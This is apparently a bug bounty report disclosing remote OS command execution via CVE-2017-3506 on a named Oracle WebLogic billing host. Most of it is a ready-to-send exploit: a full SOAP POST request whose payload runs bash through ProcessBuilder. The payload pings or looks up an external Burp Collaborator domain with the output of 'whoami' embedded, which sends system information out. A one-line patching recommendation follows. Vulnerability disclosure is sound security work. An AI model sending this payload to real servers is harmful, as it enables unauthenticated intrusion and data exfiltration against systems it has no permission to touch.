Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-3506]

##Summary Hello. I was able to identify RCE vulnerability due to the outdated Oracle Weblogic instance on `https://raebilling.mtn.co.za`. ##Steps To Reproduce * To reproduce, try this request with BurpSuite * This request to the `https://raebilling.mtn.co.za/wls-wsat/RegistrationRequesterPortType` will trigger Remote OS Command Execution: ``` POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: raebilling.mtn.co.za Content-Type: text/xml User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Accept-Languag: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3, Content-Type: text/xml;charset=UTF-8 Content-Length: 873 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>ping `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` ==**Note:**== * **To reproduce this case with nslookup or ping, `fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net` host should be replaced by your own Burp Collaborator instance or with your private `VPS IP` to catch the DNS request** ##_**Example:**_ ``` ping `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net nslookup `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net ``` ==**POC:**== {F736973} ## Suggested Mitigation/Remediation Actions * Patching WebLogic to the recent version will fix the issue. ## Impact **This vulnerability allow an unauthenticated attacker:** * To perform Remote OS Command Execution